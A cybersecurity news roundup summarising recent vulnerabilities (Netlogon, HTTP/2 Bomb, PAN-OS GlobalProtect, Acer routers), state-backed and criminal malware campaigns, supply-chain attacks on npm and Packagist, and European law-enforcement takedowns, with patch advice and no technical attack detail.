Belgium’s national cybersecurity authority (The Centre for Cybersecurity Belgium, CCB) has warned that cybercriminals are actively exploiting a recently patched Windows Netlogon vulnerability. The flaw, tracked as CVE-2026-41089, was fixed by Microsoft during its May 2026 Patch Tuesday release. It affects all supported versions of Windows Server, including Windows Server 2025.
A remote denial-of-service vulnerability has been discovered that affects major web servers, including NGINX, Apache HTTPD, Microsoft IIS, Envoy. Dubbed “HTTP/2 Bomb,” the flaw can be exploited over HTTP/2 to overwhelm servers and cause service disruption.
NGINX users are advised to upgrade to version 1.29.8 or later, which introduces protective limits, or disable HTTP/2 if upgrading is not possible. For Apache HTTPD, the issue is fixed in mod_http2 v2.0.41, with HTTP/2 disablement via configuration as a fallback. At the time of writing, Microsoft IIS, Envoy, and Cloudflare Pingora have yet to receive patches.
CISA has updated its Known Exploited Vulnerabilities (KEV) catalog to include several flaws that are being actively exploited in the wild. One of the issues is CVE-2024-21182 in Oracle WebLogic Server, an improper input validation flaw in the Core component that can allow a remote unauthenticated attacker to access sensitive information. Proof-of-concept exploits for this vulnerability are already publicly available.
Another is CVE-2026-0257 affecting Palo Alto Networks’ GlobalProtect portal, which involves a security restrictions bypass that could be abused to gain unauthorized VPN access. The agency also flagged CVE-2025-48595 in the Android Framework, an integer overflow vulnerability that can enable a local application to escalate privileges on a device.
In addition, CVE-2022-0492 in the Linux kernel (the cgroups v1 release_agent feature) can lead to privilege escalation. The list also includes CVE-2026-45247, a deserialization of untrusted data issue affecting Mirasvit Cache Warmer, a popular Magento full-page cache extension.
Threat actors are actively exploiting a recently patched security flaw in its PAN-OS GlobalProtect software to target corporate networks.The now fixed vulnerability, tracked as CVE-2026-0257, allows attackers to bypass authentication and establish unauthorized VPN connections on affected devices. Palo Alto Networks said that it “has become aware of limited exploit attempts on unpatched PAN-OS devices without mitigations applied.”
Acer is working on fixes for two high-severity vulnerabilities affecting Wave 7 mesh routers running firmware version T7c_GBL_1.01.000055 or earlier. The first flaw, tracked as CVE-2026-49200, is a broken access control vulnerability that could allow unauthenticated remote attackers to access plaintext credentials stored in router log archives. The second issue (CVE-2026-49201) involves a hardcoded cryptographic key that could enable remote, unauthenticated attackers to gain persistent backdoor access to affected devices. Acer said that a firmware update addressing both vulnerabilities is scheduled for release by the end of June 2026.
The Russian state-backed cyberespionage group Gamaredon has launched a new campaign against Ukrainian government, military, and critical infrastructure organizations, deploying a VBScript-based worm that hides within native Windows features and uses cloud services for command-and-control (C&C) communications. The campaign begins with weaponized xHTML files that deliver a malicious RAR archive exploiting a WinRAR RCE vulnerability (CVE-2025-8088). The second and third parts of Sekoia’s report on Gamaredon can be found here and here.
A threat group known as GreyVibe has been targeting Ukrainian and Ukraine-related organizations using AI-generated lures and custom malware tools. The campaign, active since at least August 2025, has targeted military, government, civilian, and business sectors through phishing emails, fake websites, and deceptive online services.
A new cyber espionage campaign, dubbed “Operation Dragon Weave,” is targeting government officials and citizens in the Czech Republic and Taiwan. The campaign mainly targets organizations in government, research, education, technology, and financial services. Attackers send spear-phishing emails containing ZIP file attachments. The attack chains eventually install a Rust-based malware loader known as RUSTCLOAK, which then deploys a remote access tool called AZUREVEIL.
A Chinese-speaking cybercrime group, tracked as TA4922, has expanded its operations into Europe, targeting organizations in Germany, Italy, the United Kingdom, and South Africa with new malware and the Atlas remote access trojan (RAT). Proofpoint researchers say that TA4922 now conducts more unique campaigns than any other cybercrime actor they track. The threat actor uses localized phishing emails disguised as payroll notices, tax audits, VAT filings, invoices, and government compliance requests to infect victim systems with the Atlas RAT backdoor.
The Five Eyes intelligence alliance warned that Chinese spies are using online job sites to recruit people with access to sensitive information. Intelligence officers allegedly pose as recruiters or consultants to target government workers, military personnel, and others who may have access to classified data, including academics, journalists, and think tank staff.
LevelBlue discovered a sophisticated macOS campaign orchestrated by North Korean threat group tracked as Sapphire Sleet and BlueNoroff/UNC1069, targeting venture capital firms, Web3 developers, and cryptocurrency organizations. Attackers impersonate recruiters, investors, or business partners to convince victims to install a fake Zoom update before a video meeting. The malicious script collects and exfiltrates sensitive data, including crypto wallets, browser extension data, Telegram sessions, SSH keys, and unencrypted Apple Notes.
Another North Korean threat group known as Famous Chollima has been observed targeting PHP developers through a compromised package published on Packagist. The malware loader is concealed within both the Packagist-hosted package and an associated GitHub branch, enabling it to retrieve and execute remote code. Researchers believe the campaign may be linked to a Contagious Interview-style social engineering operation designed to infect developer environments.
The third North Korean actor, tracked as Kimsuky (aka Velvet Chollima), has been linked to a wave of attacks targeting South Korean military and corporate entities through March and April 2026. The campaign utilized a variety of techniques, including the JSONPing method and a new HttpSpy variant, which now uses three-stage execution chain (Installer - Loader - HttpSpy).
The latest Sonatype research looks into a Lazarus Group npm campaign using dozens of malicious packages to abuse developer trust and deliver follow-on payloads. The threat actor leverages tactics like suffix-addition, embedding and version mimicry.
Symantec has detailed a five-month espionage campaign that targeted the email account of an unnamed senior executive at a major global stock exchange. Unknown attackers stole emails from the executive’s Outlook mailbox in small batches and used Dropbox and OneDrive Personal to hide the data theft within normal-looking internet traffic.
Iran’s Ministry of Intelligence (MOIS) has likely expanded its “Handala” brand beyond cyber activities to include influence campaigns and physical operations targeting US and Israeli interests. Researchers observed links between the Handala Hack Team, a new group called the “Handala Popular Resistance Front” (HPRF), and several influence-operation networks. Based on their coordinated online activity and shared content, the groups are believed to be connected to MOIS, although with varying levels of confidence.
The US Treasury's Office of Foreign Assets Control (OFAC) has imposed sanctions on Iran’s largest cryptocurrency exchange Nobitex for allegedly facilitating transactions linked to terrorism and helping users evade international economic sanctions. US authorities claim the exchange processed transactions connected to the Islamic Revolutionary Guard Corps (IRGC), including wallets associated with ransomware actors linked to the group.
Cybersecurity researchers at Sophos have uncovered a ransomware-related framework that uses artificial intelligence to speed up malware development and testing. The toolkit automates Active Directory (AD) discovery and includes features designed to evade endpoint detection and response (EDR) products.
JFrog researchers found a malware called IronWorm, a powerful Rust-based infostealer that steals developer secrets, hides using a kernel-level rootkit, and communicates through Tor. Like the Shai-Hulud worm, it spreads by abusing stolen credentials to insert itself into GitHub repositories and publish malicious packages on NPM, turning trusted developer tools into a self-replicating supply-chain attack. It mainly targets software and crypto/Web3 developers.
Speaking of Shai-Hulud, multiple security firms observed a malicious npm supply-chain campaign affecting several Red Hat Cloud Services packages. The attack, described as a “mini Shai-Hulud” campaign, is designed to steal developer credentials and CI/CD secrets during package installation.
Check Point Research found a large campaign that created fake websites imitating popular open-source tools like Ghidra, dnSpy, and SpiderFoot to attract search traffic. The sites looked legitimate and used ad and monetization systems, but some users were redirected through chains that led to malware. The infrastructure delivered several threats, including information stealers and clippers like RemusStealer and AnimateClipper, as well as unwanted applications.
A new phishing scam is targeting Chrome extension developers with fake copyright removal warnings. The message looks real and even shows the extension’s actual name and icon after entering its ID. However, it’s a trick to steal Google login details. If successful, attackers can take over the developer’s account and potentially push harmful updates to users.
A large-scale malware campaign called WeedHack has infected more than 116,000 computers since January by targeting Minecraft players. The malware spreads through fake Minecraft mods, cheats, clients, and other tools. The programs are promoted through YouTube videos and fake websites that appear in search results. The malware is designed to steal sensitive information, including passwords, browser cookies, cryptocurrency wallet data, and login details for platforms such as Discord, Steam, and Telegram. It can also take screenshots of infected devices.
US agencies are warning that hackers are targeting exposed automatic tank gauge (ATG) systems used to monitor fuel and liquid storage tanks. The systems, used in sectors like energy, food, chemicals, and transport, are being attacked through security flaws such as weak or hardcoded passwords, software vulnerabilities, and command execution bugs. Attackers can gain access and change system settings remotely.
Dutch authorities have dismantled a botnet consisting of at least 17 million infected devices and seized more than 200 servers used to support the network, cutting off communication between the controllers and the infected devices.
Spanish and German authorities have dismantled the CrimeNetwork dark web marketplace, one of the largest platforms offering illegal goods and services under the “Crime-as-a-Service” model. The platform's administrator was arrested in Spain and four additional suspects were apprehended in Germany. Authorities conducted two searches in Mallorca and three in Germany and seized the platform's server, which had more than 100,000 users.
In a separate operation, Spanish and French authorities have taken down an online marketplace that offered counterfeit identity documents to migrant smuggling networks across the European Union. Police arrested a suspect in Alicante, Spain, and seized document-production equipment along with around 800 fake European identity documents from an apartment rented under a false identity. The investigation began when French authorities discovered a website advertising counterfeit documents and traced its operator to Alicante, where he had been living since 2024.
A major international operation coordinated by Bulgaria and Europol targeted criminal networks profiting from illegal streaming of sports, films, and TV channels. Over seven months, authorities arrested 29 people, dismantled nine organized crime groups, and removed more than 27,000 illegal streaming URLs.